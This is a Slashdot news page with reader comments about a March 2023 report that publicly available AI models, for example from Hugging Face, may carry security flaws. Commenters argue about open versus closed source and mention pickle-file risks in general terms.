Catch up on stories from the past week (and beyond) at the Slashdot story archive

 



Forgot your password?
typodupeerror
×
AI Security

Free AI Programs Prone To Security Risks, Researchers Say (bloomberg.com) 17

Companies rushing to adopt hot new types of artificial intelligence should exercise caution when using open-source versions of the technology, some of which may not work as advertised or include flaws that hackers can exploit, security researchers say. From a report: There are few ways to know in advance if a particular AI model -- a program made up of algorithms that can do such things as generate text, images and predictions -- is safe, said Hyrum Anderson, distinguished engineer at Robust Intelligence, a machine learning security company that lists the US Defense Department as a client. Anderson said he found that half the publicly available models for classifying images failed 40% of his tests. The goal was to determine whether a malicious actor could alter the outputs of AI programs in a manner that could constitute a security risk or provide incorrect information. Often, models use file types that are particularly prone to security flaws, Anderson said. It's an issue because so many companies are grabbing models from publicly available sources without fully understanding the underlying technology, rather than creating their own. Ninety percent of the companies Robust Intelligence works with download models from Hugging Face, a repository of AI models, he said.
This discussion has been archived. No new comments can be posted.

Free AI Programs Prone To Security Risks, Researchers Say

Comments Filter:
  • Oh boy... (Score:5, Funny)

    by satanicat ( 239025 ) on Wednesday March 29, 2023 @04:47PM (#63409944)

    Obligatory XKCD: https://xkcd.com/2228/

  • In theory (Score:5, Insightful)

    by Baron_Yam ( 643147 ) on Wednesday March 29, 2023 @04:49PM (#63409954)

    With open source you can find out about the bugs at the same time as the bad guys.

    With closed source, you'll find out after you're burned - if you can afford the lawsuit against the software vendor.

    • by Draeven ( 166561 )

      In this case, closed source means in the cloud. The security vulnerabilities they're talking about here are malicious code being embedded in python pickle formatted checkpoints.

      tl;dr: Don't download stable diffusion, pay us, the trustworthy saviors of humanity, OpenAI to use our image generator instead.

      • tl;dr: Don't download stable diffusion, pay us, the trustworthy saviors of humanity, OpenAI to use our image generator instead.

        Yep. My comment on the other article [slashdot.org] didn't last 12 hours before this article's "warning" showed up....

        "Beware of he who would deny you access to information, for in his heart he dreams himself your master." - Commisioner Pravin Lal.

    • This is true with source code -- even a relatively large code base. But a large language model can be terabytes upon terabytes of data, and it's unlikely to have been scoured with the diligence of, say, the Linux kernel.

  • And so it begins. (Score:5, Interesting)

    by nightflameauto ( 6607976 ) on Wednesday March 29, 2023 @05:11PM (#63410024)

    AI, such as it is today, takes massive amounts of horsepower, which is barrier to entry number 1. All the yelling about controlls from the massive corporations hoping to profit from AI today is, or likely soon will be once governments take it seriously enough, barrier to entry number 2. "Open Source is bad, mmmmkay," is barrier to entry number 3, and the real kick to the crotch that would have like to have seen this particular part of technology not just be one more bit of possibility used to pull yet more money away from people and consolidate it in the hands of the few.

    It's not like AI itself isn't filled with scary possibilities. Let's do everything we can to keep it from being open and available without oversight from our corporate overlords, please. We've seen over the centuries that big money interests always do what is right for the overall population, so they're the ones best equipped to decide for us what's right and wrong on this front as well.

    I thought even the press grew tired of the "open source = worthless because it might have bugs" rhetoric a long while back. Because closed source has such a stellar track record lately. Glad to see some layers of tech bullshit never go out of style.

  • by larryjoe ( 135075 ) on Wednesday March 29, 2023 @05:15PM (#63410032)

    There are no AI models that are 100% accurate. Yet, there are quite a few software systems that incorporate these less than perfect AI models. The key is the realization that the AI models are only part of the pipeline and that succeeding stages of the pipeline are needed to compensate for the expected AI model inaccuracy. For example, for an autonomous vehicle processing camera images at 30 fps, if the AI object detection were 99% accurate (which is really good), then an error would be expected every few seconds. A tracker that compensates for that inaccuracy is indispensable.

    Now, there is academic research on adversarial attacks, where the inputs to the perception are slightly altered to produce security critical effects. However, the required attack models are usually a bit extreme and arguably not practical, i.e., hard to pull off in practice or requires enough system access so that the system has already been compromised. But even the vulnerability aspects of these attacks are inherent in the models and have nothing to do with the purchase price or permissiveness of the software license.

    • Well then, that went well. Clearly I wasn't properly caffeinated. Ignore me everyone. They were talking about free, not open source. Funny how my mind went right there. Meh. Long day.

    • by gweihir ( 88907 )

      Actually, it is a security risk when used in security critical applications. The first problem is that it is hard to find out when exactly it is hallucinating or giving false information, such as not detecting an attack. The attacker-defender asymmetry applies: An attacker needs only one vulnerability to get in, a defender needs to fix all of them (or at least all that an attacker can potentially find). Second, an attacker can introduce obscure or bizarre cases that nobody expects but that the attacker late

  • by sarren1901 ( 5415506 ) on Wednesday March 29, 2023 @05:26PM (#63410056)

    Research shows!

  • This just in (Score:3, Interesting)

    by Tyr07 ( 8900565 ) on Wednesday March 29, 2023 @05:43PM (#63410094)

    Corporation are terrified that you may take advantages of new technology and AI without paying th..I mean without due consideration for your safety.

  • by lpq ( 583377 ) on Wednesday March 29, 2023 @07:29PM (#63410312) Homepage Journal

    All your data is kept by the company you are using on their servers. Not only is that a hack risk, but privacy as well. Until versions are available allowing storage locally, companies will be vulnerable to hacks of their vendor or just plain snooping by their vendor to make sure their use aligns with what the vendor wants to present.

  • by JasterBobaMereel ( 1102861 ) on Thursday March 30, 2023 @04:48AM (#63410906)

    ....and so says Open Source is unsafe and they can prove it ...

    then fails to show their closed source system is safer

  • Straight from Microsoft's 1999 FUD 101 textbook.

  • The only difference is that finding these flaws in closed commercial stuff is harder. The same risks exist there, and because people think they can hide them, they are often worse.

"Sometimes insanity is the only alternative" -- button at a Science Fiction convention.

Working...